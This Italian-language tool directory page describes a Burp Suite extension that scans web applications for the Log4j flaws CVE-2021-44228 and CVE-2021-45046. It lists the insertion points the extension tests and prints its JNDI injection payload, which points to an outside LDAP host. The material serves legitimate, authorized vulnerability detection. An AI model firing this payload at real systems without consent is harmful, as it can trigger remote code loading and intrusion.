Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Burp-Log4j-HammerTime — Estensione di Burp Active Scan per identificare le vulnerabilità Log4j CVE-2021-44228 e CVE-2021-45046 | Kitploit
Strumenti/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
Scanner di VulnerabilitàAnalisi Dinamica (Sandboxing)ExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Estensione di Burp Active Scan per identificare le vulnerabilità Log4j CVE-2021-44228 e CVE-2021-45046

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
84 anni faNon ancora revisionato

Log4j-HammerTime

Questa estensione dello Scanner Attivo di Burp Suite verifica lo sfruttamento delle vulnerabilità Apache Log4j CVE-2021-44228 e CVE-2021-45046.

Questa estensione utilizza Burp Collaborator per verificare il problema.

Utilizzo

  • Abilita questa estensione
  • Avvia una scansione attiva su un target specifico

se vuoi eseguire solo i controlli di questo modulo, puoi importare il profilo extensions-only.json e selezionarlo come profilo di scansione attiva.

Dettagli

Durante una scansione attiva, i seguenti punti di inserimento vengono provati in questa estensione:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

In ogni punto di inserimento, la richiesta viene iniettata con il seguente payload: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

Inoltre, questa estensione aggiunge molte intestazioni abilitate in headers (righe non commentate). Queste intestazioni vengono iniettate una alla volta in una richiesta separata.

Dichiarazione di non responsabilità legale

Questo progetto è realizzato solo a scopo educativo e di test etico. L'uso di Log4Shell-active-scanner per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili di eventuali usi impropri o danni causati da questo programma.

Licenza

Il progetto è concesso in licenza sotto la MIT License.

Autori

  • Freskimo
Scarica lo strumento